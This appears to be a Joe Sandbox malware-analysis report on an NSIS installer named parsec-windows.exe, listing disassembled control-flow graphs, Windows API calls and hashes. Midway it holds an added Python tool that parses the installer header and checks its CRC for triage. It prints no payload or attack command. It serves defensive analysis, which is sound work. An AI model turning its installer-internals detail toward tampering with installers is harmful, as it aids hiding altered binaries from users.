3600 403032 3598->3600 3601 40302b DestroyWindow 3598->3601 3602 403042 3599->3602 3603 40304a GetTickCount 3599->3603 3600->3508 3601->3600 3604 406946 2 API calls 3602->3604 3605 403058 CreateDialogParamW ShowWindow 3603->3605 3606 40307b 3603->3606 3607 403048 3604->3607 3605->3606 3606->3508 3607->3508 3608->3516 3609->3515 3611 403ed6 3610->3611 3627 406484 wsprintfW 3611->3627 3613 403f47 3628 403f7b 3613->3628 3615 403c77 3615->3538 3616 403f4c 3616->3615 3617 40657a 17 API calls 3616->3617 3617->3616 3631 4044e5 3618->3631 3620 405695 3623 401389 2 API calls 3620->3623 3624 4056bc 3620->3624 3621 4044e5 SendMessageW 3622 4056ce CoUninitialize 3621->3622 3622->3570 3623->3620 3624->3621 3625->3535 3626->3540 3627->3613 3629 40657a 17 API calls 3628->3629 3630 403f89 SetWindowTextW 3629->3630 3630->3616 3632 4044fd 3631->3632 3633 4044ee SendMessageW 3631->3633 3632->3620 3633->3632 4390 401a30 4391 402da6 17 API calls 4390->4391 4392 401a39 ExpandEnvironmentStringsW 4391->4392 4393 401a4d 4392->4393 4395 401a60 4392->4395 4394 401a52 lstrcmpW 4393->4394 4393->4395 4394->4395 4401 4023b2 4402 4023ba 4401->4402 4404 4023c0 4401->4404 4403 402da6 17 API calls 4402->4403 4403->4404 4405 402da6 17 API calls 4404->4405 4406 4023ce 4404->4406 4405->4406 4407 4023dc 4406->4407 4408 402da6 17 API calls 4406->4408 4409 402da6 17 API calls 4407->4409 4408->4407 4410 4023e5 WritePrivateProfileStringW 4409->4410 3739 402434 3740 402467 3739->3740 3741 40243c 3739->3741 3742 402da6 17 API calls 3740->3742 3743 402de6 17 API calls 3741->3743 3744 40246e 3742->3744 3745 402443 3743->3745 3750 402e64 3744->3750 3747 40247b 3745->3747 3748 402da6 17 API calls 3745->3748 3749 402454 RegDeleteValueW RegCloseKey 3748->3749 3749->3747 3751 402e71 3750->3751 3752 402e78 3750->3752 3751->3747 3752->3751 3754 402ea9 3752->3754 3755 4063aa RegOpenKeyExW 3754->3755 3756 402ed7 3755->3756 3757 402ee1 3756->3757 3758 402f8c 3756->3758 3759 402ee7 RegEnumValueW 3757->3759 3766 402f0a 
3757->3766 3758->3751 3761 402f71 RegCloseKey 3759->3761 3759->3766 3760 402f46 RegEnumKeyW 3762 402f4f RegCloseKey 3760->3762 3760->3766 3761->3758 3763 40690a 5 API calls 3762->3763 3765 402f5f 3763->3765 3764 402ea9 6 API calls 3764->3766 3767 402f81 3765->3767 3768 402f63 RegDeleteKeyW 3765->3768 3766->3760 3766->3761 3766->3762 3766->3764 3767->3758 3768->3758 4411 401735 4412 402da6 17 API calls 4411->4412 4413 40173c SearchPathW 4412->4413 4414 401757 4413->4414 4415 401d38 4416 402d84 17 API calls 4415->4416 4417 401d3f 4416->4417 4418 402d84 17 API calls 4417->4418 4419 401d4b GetDlgItem 4418->4419 4420 402638 4419->4420 4421 4014b8 4422 4014be 4421->4422 4423 401389 2 API calls 4422->4423 4424 4014c6 4423->4424 4425 40263e 4426 402652 4425->4426 4427 40266d 4425->4427 4428 402d84 17 API calls 4426->4428 4429 402672 4427->4429 4430 40269d 4427->4430 4437 402659 4428->4437 4431 402da6 17 API calls 4429->4431 4432 402da6 17 API calls 4430->4432 4434 402679 4431->4434 4433 4026a4 lstrlenW 4432->4433 4433->4437 4442 40655f WideCharToMultiByte 4434->4442 4436 40268d lstrlenA 4436->4437 4438 4026d1 4437->4438 4439 4026e7 4437->4439 4441 40610e 5 API calls 4437->4441 4438->4439 4440 4060df WriteFile 4438->4440 4440->4439 4441->4438 4442->4436

                                Control-flow Graph

                                control_flow_graph 621 405c49-405c6f call 405f14 624 405c71-405c83 DeleteFileW 621->624 625 405c88-405c8f 621->625 626 405e05-405e09 624->626 627 405c91-405c93 625->627 628 405ca2-405cb2 call 40653d 625->628 629 405db3-405db8 627->629 630 405c99-405c9c 627->630 636 405cc1-405cc2 call 405e58 628->636 637 405cb4-405cbf lstrcatW 628->637 629->626 632 405dba-405dbd 629->632 630->628 630->629 634 405dc7-405dcf call 406873 632->634 635 405dbf-405dc5 632->635 634->626 645 405dd1-405de5 call 405e0c call 405c01 634->645 635->626 639 405cc7-405ccb 636->639 637->639 641 405cd7-405cdd lstrcatW 639->641 642 405ccd-405cd5 639->642 644 405ce2-405cfe lstrlenW FindFirstFileW 641->644 642->641 642->644 646 405d04-405d0c 644->646 647 405da8-405dac 644->647 661 405de7-405dea 645->661 662 405dfd-405e00 call 40559f 645->662 649 405d2c-405d40 call 40653d 646->649 650 405d0e-405d16 646->650 647->629 652 405dae 647->652 663 405d42-405d4a 649->663 664 405d57-405d62 call 405c01 649->664 653 405d18-405d20 650->653 654 405d8b-405d9b FindNextFileW 650->654 652->629 653->649 657 405d22-405d2a 653->657 654->646 660 405da1-405da2 FindClose 654->660 657->649 657->654 660->647 661->635 667 405dec-405dfb call 40559f call 4062fd 661->667 662->626 663->654 668 405d4c-405d55 call 405c49 663->668 672 405d83-405d86 call 40559f 664->672 673 405d64-405d67 664->673 667->626 668->654 672->654 676 405d69-405d79 call 40559f call 4062fd 673->676 677 405d7b-405d81 673->677 676->654 677->654
                                APIs
                                • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBA
                                • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CDD
                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsvA814.tmp\*.*$\*.*
                                • API String ID: 2035342205-184083500
                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                APIs
                                • FindFirstFileW.KERNELBASE(74DF3420,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: C:\
                                • API String ID: 2295610775-3404278061
                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

                                Control-flow Graph

                                control_flow_graph 192 404f06-404f52 GetDlgItem * 2 193 404f58-404ff0 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 192->193 194 40517d-405184 192->194 197 404ff2-404ffd SendMessageW 193->197 198 404fff-405006 DeleteObject 193->198 195 405186-405196 194->195 196 405198 194->196 199 40519b-4051a4 195->199 196->199 197->198 200 405008-405010 198->200 201 4051a6-4051a9 199->201 202 4051af-4051b5 199->202 203 405012-405015 200->203 204 405039-40503d 200->204 201->202 206 405293-40529a 201->206 207 4051c4-4051cb 202->207 208 4051b7-4051be 202->208 209 405017 203->209 210 40501a-405037 call 40657a SendMessageW * 2 203->210 204->200 205 40503f-40506f call 404499 * 2 204->205 248 405075-40507b 205->248 249 40513f-405152 GetWindowLongW SetWindowLongW 205->249 215 40530b-405313 206->215 216 40529c-4052a2 206->216 211 405240-405243 207->211 212 4051cd-4051d0 207->212 208->206 208->207 209->210 210->204 211->206 217 405245-40524f 211->217 220 4051d2-4051d9 212->220 221 4051db-4051f0 call 404e54 212->221 218 405315-40531b SendMessageW 215->218 219 40531d-405324 215->219 224 4052a8-4052b2 216->224 225 4054fe-405510 call 404500 216->225 226 405251-40525d SendMessageW 217->226 227 40525f-405269 217->227 218->219 229 405326-40532d 219->229 230 405358-40535f 219->230 220->211 220->221 221->211 247 4051f2-405203 221->247 224->225 233 4052b8-4052c7 SendMessageW 224->233 226->227 227->206 234 40526b-405275 227->234 236 405336-40533d 229->236 237 40532f-405330 ImageList_Destroy 229->237 240 4054c0-4054c7 230->240 241 405365-405371 call 4011ef 230->241 233->225 242 4052cd-4052de SendMessageW 233->242 243 405286-405290 234->243 244 405277-405284 234->244 245 405346-405352 236->245 246 40533f-405340 GlobalFree 236->246 237->236 240->225 253 4054c9-4054d0 240->253 266 405381-405384 241->266 267 405373-405376 241->267 251 4052e0-4052e6 242->251 252 4052e8-4052ea 242->252 243->206 244->206 245->230 246->245 247->211 
256 405205-405207 247->256 257 40507e-405084 248->257 255 405158-40515b 249->255 251->252 259 4052eb-405304 call 401299 SendMessageW 251->259 252->259 253->225 254 4054d2-4054fc ShowWindow GetDlgItem ShowWindow 253->254 254->225 260 405175-405178 call 4044ce 255->260 261 40515d-405170 ShowWindow call 4044ce 255->261 262 405209-405210 256->262 263 40521a 256->263 264 405121-405134 257->264 265 40508a-4050b5 257->265 259->215 260->194 261->225 274 405212-405214 262->274 275 405216-405218 262->275 276 40521d-405239 call 40117d 263->276 264->257 269 40513a-40513d 264->269 277 4050f1-4050f3 265->277 278 4050b7-4050ef SendMessageW 265->278 270 4053c5-4053e9 call 4011ef 266->270 271 405386-40539f call 4012e2 call 401299 266->271 279 405378 267->279 280 405379-40537c call 404ed4 267->280 269->249 269->255 293 40548b-405494 270->293 294 4053ef 270->294 299 4053a1-4053a7 271->299 300 4053af-4053be SendMessageW 271->300 274->276 275->276 276->211 286 4050f5-405107 SendMessageW 277->286 287 405109-40511e SendMessageW 277->287 278->264 279->280 280->266 286->264 287->264 296 4054a2-4054aa 293->296 297 405496-40549c InvalidateRect 293->297 298 4053f2-4053fd 294->298 296->240 303 4054ac-4054bb call 404e27 call 404e0f 296->303 297->296 301 405473-405485 298->301 302 4053ff-40540e 298->302 306 4053a9 299->306 307 4053aa-4053ad 299->307 300->270 301->293 301->298 304 405410-40541d 302->304 305 405421-405424 302->305 303->240 304->305 309 405426-405429 305->309 310 40542b-405434 305->310 306->307 307->299 307->300 312 405439-405471 SendMessageW * 2 309->312 310->312 313 405436 310->313 312->301 313->312
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                • DeleteObject.GDI32(00000000), ref: 00405000
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                • GlobalFree.KERNEL32(?), ref: 00405340
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                • ShowWindow.USER32(00000000), ref: 004054FC
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 2564846305-813528018
                                • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

                                 Control-flow Graph (legend in the original report: Executed / Not Executed)
                                control_flow_graph 496 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 499 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 496->499 500 4030cd-4030d2 496->500 508 4031f0-4031fe call 403019 499->508 509 40310b 499->509 501 4032ad-4032b1 500->501 515 403200-403203 508->515 516 403253-403258 508->516 511 403110-403127 509->511 513 403129 511->513 514 40312b-403134 call 4034cf 511->514 513->514 522 40325a-403262 call 403019 514->522 523 40313a-403141 514->523 518 403205-40321d call 4034e5 call 4034cf 515->518 519 403227-403251 GlobalAlloc call 4034e5 call 4032b4 515->519 516->501 518->516 542 40321f-403225 518->542 519->516 547 403264-403275 519->547 522->516 527 403143-403157 call 405fe8 523->527 528 4031bd-4031c1 523->528 533 4031cb-4031d1 527->533 545 403159-403160 527->545 532 4031c3-4031ca call 403019 528->532 528->533 532->533 538 4031e0-4031e8 533->538 539 4031d3-4031dd call 4069f7 533->539 538->511 546 4031ee 538->546 539->538 542->516 542->519 545->533 551 403162-403169 545->551 546->508 548 403277 547->548 549 40327d-403282 547->549 548->549 552 403283-403289 549->552 551->533 553 40316b-403172 551->553 552->552 554 40328b-4032a6 SetFilePointer call 405fe8 552->554 553->533 555 403174-40317b 553->555 559 4032ab 554->559 555->533 556 40317d-40319d 555->556 556->516 558 4031a3-4031a7 556->558 560 4031a9-4031ad 558->560 561 4031af-4031b7 558->561 559->501 560->546 560->561 561->533 562 4031b9-4031bb 561->562 562->533
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040308E
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                 • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\PSecWin$C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft$}8@
                                • API String ID: 2803837635-123549853
                                • Opcode ID: 9b3c223e6497c9ecab6ee529ea5d4dae661a82a949c3a0db8cd0915d622aa761
                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                • Opcode Fuzzy Hash: 9b3c223e6497c9ecab6ee529ea5d4dae661a82a949c3a0db8cd0915d622aa761
                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
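The call sequence in this function (GetModuleFileNameW on itself, GetFileSize, GlobalAlloc, SetFilePointer) together with the string IDs Null, soft, Inst and "Installer integrity check has failed" is the stock NSIS stub locating its own "firstheader" in the file and verifying the CRC over the payload; the three short strings are the dword immediates the stub compares against the 12-byte signature "NullsoftInst". The following Python is an added triage example, not code from the report, from Parsec or from NSIS. The header layout and flag bits are taken from my reading of NSIS's Source/exehead/fileform.h; the CRC coverage (zlib-compatible CRC32 from byte 0 up to, but excluding, the dword stored in the last 4 bytes of the NSIS data) is my reading of the stub and should be confirmed against a known-good installer. build_sample constructs a synthetic NSIS-shaped file for offline use; it is not a real installer.

```python
import struct
import zlib

# NSIS firstheader layout and flag values as I read them in NSIS's
# Source/exehead/fileform.h (assumption: verify against a known-good installer).
FH_SIG = 0xDEADBEEF                 # siginfo dword
FH_SIGNATURE = b"NullsoftInst"      # nsinst[3]: the "Null" / "soft" / "Inst" immediates
FH_FLAGS_UNINSTALL = 0x1
FH_FLAGS_SILENT = 0x2
FH_FLAGS_NO_CRC = 0x4
FH_FLAGS_FORCE_CRC = 0x8
FH_FLAGS_MASK = 0xF
# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FIRSTHEADER = struct.Struct("<II12sII")
# siginfo immediately followed by the signature; the flags dword precedes it.
MAGIC = struct.pack("<I", FH_SIG) + FH_SIGNATURE


def describe_flags(flags):
    """Human-readable names for the firstheader flag bits that are set."""
    names = {FH_FLAGS_UNINSTALL: "uninstall", FH_FLAGS_SILENT: "silent",
             FH_FLAGS_NO_CRC: "no-crc", FH_FLAGS_FORCE_CRC: "force-crc"}
    return [name for bit, name in names.items() if flags & bit]


def find_firstheader(data):
    """Return (offset, fields) of the first plausible firstheader, or None.

    The stub reads the file in 512-byte steps and tests each chunk start, so a
    genuine header sits at a 512-byte-aligned offset; this search accepts any
    offset and only reports the alignment, which is useful on repacked files.
    """
    pos = data.find(MAGIC)
    while pos != -1:
        offset = pos - 4
        if offset >= 0 and offset + FIRSTHEADER.size <= len(data):
            flags, _sig, _nsinst, hdr_len, total_len = FIRSTHEADER.unpack_from(data, offset)
            # Same sanity checks the stub applies: no unknown flag bits, sane length.
            if (flags & ~FH_FLAGS_MASK) == 0 and total_len >= FIRSTHEADER.size:
                return offset, {
                    "flags": flags,
                    "flag_names": describe_flags(flags),
                    "length_of_header": hdr_len,
                    "length_of_all_following_data": total_len,
                    "aligned_512": offset % 512 == 0,
                }
        pos = data.find(MAGIC, pos + 1)
    return None


def check_integrity(data):
    """Reproduce the stub's integrity check; returns (status, detail).

    Unless FH_FLAGS_NO_CRC is set, CRC32 of the file from byte 0 up to the
    last 4 bytes of the NSIS data must equal the dword stored in those bytes.
    """
    found = find_firstheader(data)
    if found is None:
        return "no-nsis-header", None
    offset, fh = found
    end = offset + fh["length_of_all_following_data"]
    if end > len(data):
        return "truncated", {"expected_end": end, "actual_size": len(data)}
    if fh["flags"] & FH_FLAGS_NO_CRC:
        return "crc-disabled", fh
    stored = struct.unpack_from("<I", data, end - 4)[0]
    computed = zlib.crc32(data[:end - 4]) & 0xFFFFFFFF
    if stored != computed:
        return "crc-mismatch", {"stored": stored, "computed": computed}
    return "ok", fh


def build_sample(stub_size=1024, payload=b"\x00" * 64, flags=0):
    """Construct a synthetic NSIS-shaped file (sample data, not a real installer):
    a fake stub padded to a 512-byte boundary, a firstheader, a payload, then CRC."""
    stub = b"MZ" + b"\x90" * (stub_size - 2)
    total = FIRSTHEADER.size + len(payload) + 4        # header + payload + CRC dword
    header = FIRSTHEADER.pack(flags, FH_SIG, FH_SIGNATURE, len(payload), total)
    body = stub + header + payload
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(check_integrity(blob))
```

Run it against the dropped C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe: the reported offset is where an NSIS extractor starts reading, the flag names tell you whether the build disabled the CRC, and "crc-mismatch" on a file that is not truncated means the bytes after the stub were changed after compilation.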

                                 Control-flow Graph (legend in the original report: Executed / Not Executed)
                                control_flow_graph 563 40657a-406585 564 406587-406596 563->564 565 406598-4065ae 563->565 564->565 566 4065b0-4065bd 565->566 567 4065c6-4065cf 565->567 566->567 568 4065bf-4065c2 566->568 569 4065d5 567->569 570 4067aa-4067b5 567->570 568->567 571 4065da-4065e7 569->571 572 4067c0-4067c1 570->572 573 4067b7-4067bb call 40653d 570->573 571->570 574 4065ed-4065f6 571->574 573->572 576 406788 574->576 577 4065fc-406639 574->577 580 406796-406799 576->580 581 40678a-406794 576->581 578 40672c-406731 577->578 579 40663f-406646 577->579 585 406733-406739 578->585 586 406764-406769 578->586 582 406648-40664a 579->582 583 40664b-40664d 579->583 584 40679b-4067a4 580->584 581->584 582->583 587 40668a-40668d 583->587 588 40664f-40666d call 40640b 583->588 584->570 591 4065d7 584->591 592 406749-406755 call 40653d 585->592 593 40673b-406747 call 406484 585->593 589 406778-406786 lstrlenW 586->589 590 40676b-406773 call 40657a 586->590 597 40669d-4066a0 587->597 598 40668f-40669b GetSystemDirectoryW 587->598 602 406672-406676 588->602 589->584 590->589 591->571 601 40675a-406760 592->601 593->601 604 4066a2-4066b0 GetWindowsDirectoryW 597->604 605 406709-40670b 597->605 603 40670d-406711 598->603 601->589 606 406762 601->606 608 406713-406717 602->608 609 40667c-406685 call 40657a 602->609 603->608 610 406724-40672a call 4067c4 603->610 604->605 605->603 607 4066b2-4066ba 605->607 606->610 614 4066d1-4066e7 SHGetSpecialFolderLocation 607->614 615 4066bc-4066c5 607->615 608->610 611 406719-40671f lstrcatW 608->611 609->603 610->589 611->610 616 406705 614->616 617 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 614->617 620 4066cd-4066cf 615->620 616->605 617->603 617->616 620->603 620->614
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 00406695
                                • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00000000,00424620,74DF23A0), ref: 004066A8
                                • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000), ref: 00406779
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Directory$SystemWindowslstrcatlstrlen
